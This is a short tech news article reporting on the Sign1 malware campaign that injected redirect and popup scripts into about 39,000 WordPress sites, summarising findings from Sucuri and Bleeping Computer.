Evasive Sign1 Malware Campaign Infected 39,000 WordPress Websites

It seems that there is a malware campaign that infected 39,000 WordPress sites. Check out more details about this very concerning matter below.

New malware campaign on the loose

A new malware campaign, called Sign1, has been discovered to infect more than 39,000 websites in the past six months.

This campaign causes users to see unwanted redirects and popup ads when visiting an infected website.

The attackers behind this campaign inject the malware into custom HTML widgets and legitimate plugins on WordPress sites.

They do this by injecting malicious Sign1 scripts into these plugins rather than modifying the actual WordPress files.

Website security firm Sucuri identified the campaign after its client’s website displayed popup ads to visitors.

The Sign1 malware campaign

Although Sucuri’s client was breached due to a brute force attack, there is no information available on how other detected sites were compromised.

However, according to previous WordPress attacks, it is likely that attackers used a combination of brute force attacks and plugin vulnerabilities exploitation to gain access to the site.

After gaining access, threat actors tend to use WordPress custom HTML widgets or install Simple Custom CSS and JS plugin, which is a legitimate tool, to inject malicious JavaScript code.

Sucuri’s analysis of Sign1 malware revealed that it employs time-based randomization to generate dynamic URLs that change every 10 minutes.

This method helps the malware evade blocks. The domains used in the attacks are registered shortly before they’re used to ensure that they’re not in any blocklists.

According to Bleeping Computer, these URLs are used to fetch further malicious scripts that are run in a visitor’s browser.

“Initially, the domains were hosted on Namecheap, but the attackers have now moved to HETZNER for hosting and Cloudflare for IP address obfuscation,” the publication notes.

The same online publication also revealed the following: “The malicious code checks for specific referrers and cookies before executing, targeting visitors from major sites like Google, Facebook, Yahoo, and Instagram and remaining dormant in other cases.”

Rada Mateescu
I'm hungry for truth, thirsty to learn, and eager to share. At Optic Flux, my goal is to deliver breaking juicy health, financial, and tech/science-related content. I focus on all that's meaningful and impactful for my readers.